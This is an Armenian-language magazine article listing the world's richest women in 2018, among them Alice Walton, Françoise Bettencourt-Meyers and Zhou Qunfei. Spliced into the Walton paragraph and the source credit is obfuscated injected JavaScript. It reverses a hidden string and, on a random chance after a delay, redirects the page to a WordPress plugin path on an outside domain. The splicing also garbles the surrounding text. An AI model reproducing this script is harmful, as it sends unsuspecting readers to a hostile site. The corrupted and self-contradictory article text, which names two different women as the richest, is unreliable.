Ովքե՞ր են 2018թ. աշխարհի ամենահարուստ կանայք

Գաղտնիք չէ, որ ամենահարուստ մարդկանց ցուցակը հիմնականում գլխավորում են տղամարդիկ, սակայն կանայք ևս ետ չեն մնում նման ցուցակներից, նույնիսկ հայտնվում են համաշխարհային վարկանիշ ունեցող ամսագրերի շապիկներին։ Ներկայացնում ենք ձեզ կանանց ցուցակ, ովքեր հասել են ֆինանսական անկախության՝ ոմանք լիովին ինքնուրույն, մյուսները՝ ստացած ժառանգությունների շնորհիվ։

Ճաո Ցունֆեյ

Ըստ «Time» ամսագրի Ճաո Ցունֆեյը թողել է դպրոցը ժամացույցների համար ոսպնյակներ արտադրող գործարանում աշխատելու համար։ Երբ նա 22 տարեկան էր, սկսեց արտադրել սեփական ժամացույցների ոսպնյակները, որոնք այնուհետև սկսեցին օգտագործվել հեռախոսների համար։ Այս չինուհի գործարարը այժմ աշխարհի ամենահարուստ ինքնակերտված կինն է, որն ունի $9,2 միլիարդ։

Ժակլին Մարս

Ժակլին Մարսին է պատկանում «Մարս» քաղցրավենիքի գործարանի մեկ երրորդը։ Ըստ Forbes ամսագրի՝ նրա կարողությունը կազմում է $28.3 միլիարդ։ Նա աշխատում էր ընկերությունում, բայց այս օրերին ավելի հայտնի է որպես բարերար։

Մարիա Ֆրանկա Ֆիսոլո

Ըստ Forbes ամսագրի՝ Մարիա Ֆրանկա Ֆիսոլոյի կարողությունը կազմում է $33,2 միլիարդ։ Նա Միշել Ֆեռերոյի այրին է, որը սովորական շոկոլադից և պնդուկից պատրաստված Նուտելան դարձրեց լեգենդար ապրանքանիշ։ Միշելը նաև «Ferrero Rocher»-ի հիմնադիրն էր։

Ֆրանսուա Բեթենքորթ-Մեյերս

Երբ անցած տարի «L’Oreal» ապրանքանիշի ժառանգորդուհի Լիլիանե Բեթենքորթը մահացավ, նրա դուստրը՝ Ֆրանսուան, դարձավ աշխարհի ամենահարուստ կինը։ Նրա կարողությունը կազմում է $44,7 միլիարդ։ Նա «Bettencourt Schueller» բարեգործական հիմնադրամի նախագահն է։

Ալիս Ուոլթոն

Ալիս Ուոլթոնը աշխարհի ամենահարուստ կինն է, նրա կարողությունը գնահատվում է $46,7 միլիարդ։ Նա «WalMart»-ի հիմնադիր Սամ Ուալթոնի դուստրն է և հիմնականում զբաղվում է արվեստի հովանավորչությամբ՝ միաժամանակ համատեղ կառավարելով ընտանեկան «Waltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton Enterprises» ընկերությունը։

Աղբյուր՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos/worlds-richest-women-2018/#!Alice_Waltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton_Worlds_Richest_Women_2018_” target=”_blank” rel=”noopener”>Slice.ca